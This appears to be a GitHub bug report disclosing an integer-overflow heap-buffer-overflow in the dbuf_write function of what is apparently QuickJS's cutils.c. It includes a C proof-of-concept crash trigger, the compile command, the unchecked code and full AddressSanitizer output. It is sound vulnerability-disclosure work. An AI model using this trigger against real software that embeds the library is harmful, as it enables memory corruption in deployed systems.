Skip to content

Heap-buffer-overflow on dbuf_write #443

Closed
Closed
Heap-buffer-overflow on dbuf_write#443
@Microsvuln

Description

@Microsvuln
Microsvuln
opened on Sep 19, 2025
#include "cutils.h"
#include <stdint.h>
#include <stdio.h>

int main(void) {
    DynBuf db; 
	dbuf_init(&db);
    uint8_t payload[16] = {0x41};           
    size_t offset = (size_t)-8;            
    size_t len    = 16;                     
    int r = dbuf_write(&db, offset, payload, len);
    printf("dbuf_write returned %d (size=%zu alloc=%zu)\n", r, db.size, db.allocated_size);
    dbuf_free(&db);
    return 0;
}

Compile :

clang -g -O1 -fsanitize=address,undefined -fno-omit-frame-pointer poc.c cutils.c -o poc

It's a heap out of bound due to integer overflow.

No overflow check here :

int dbuf_write(DynBuf *s, size_t offset, const uint8_t *data, size_t len)
{
    size_t end;
    end = offset + len;      ////////////////////// NO OVERFLOW CHECK
    if (dbuf_realloc(s, end))
        return -1;
    memcpy(s->buf + offset, data, len);                    ////////////// CRASH POINT
    if (end > s->size)
        s->size = end;
    return 0;
}

ASAN :


ASAN_OPTIONS="symbolize=1:handle_segv=1:halt_on_error=1:detect_leaks=0:fast_unwind_on_fatal=0"   ./poc
cutils.c:131:19: runtime error: addition of unsigned offset to 0x602000000010 overflowed to 0x602000000008
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior cutils.c:131:19 in 
=================================================================
==4834==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000008 at pc 0x648863d7a52a bp 0x7fff51d78690 sp 0x7fff51d77e60
WRITE of size 16 at 0x602000000008 thread T0
    #0 0x648863d7a529 in __asan_memcpy (/home/arash/Documents/vr/quickjs/poc+0xa2529) (BuildId: 40e4c7c4b5d4e0cfb93c55396917eb85e05ea1af)
    #1 0x648863db6d40 in dbuf_write /home/arash/Documents/vr/quickjs/cutils.c:131:5
    #2 0x648863db5f9d in main /home/arash/Documents/vr/quickjs/dbuf_oob.c:13:13
    #3 0x79f866229d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #4 0x79f866229e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #5 0x648863cf8304 in _start (/home/arash/Documents/vr/quickjs/poc+0x20304) (BuildId: 40e4c7c4b5d4e0cfb93c55396917eb85e05ea1af)

0x602000000008 is located 8 bytes to the left of 8-byte region [0x602000000010,0x602000000018)
allocated by thread T0 here:
    #0 0x648863d7b576 in __interceptor_realloc (/home/arash/Documents/vr/quickjs/poc+0xa3576) (BuildId: 40e4c7c4b5d4e0cfb93c55396917eb85e05ea1af)
    #1 0x648863db67ee in dbuf_default_realloc /home/arash/Documents/vr/quickjs/cutils.c:86:12
    #2 0x648863db6978 in dbuf_realloc /home/arash/Documents/vr/quickjs/cutils.c:114:19
    #3 0x648863db6c99 in dbuf_write /home/arash/Documents/vr/quickjs/cutils.c:129:9
    #4 0x648863db5f9d in main /home/arash/Documents/vr/quickjs/dbuf_oob.c:13:13
    #5 0x79f866229d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/arash/Documents/vr/quickjs/poc+0xa2529) (BuildId: 40e4c7c4b5d4e0cfb93c55396917eb85e05ea1af) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa[fa]00 fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==4834==ABORTING

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions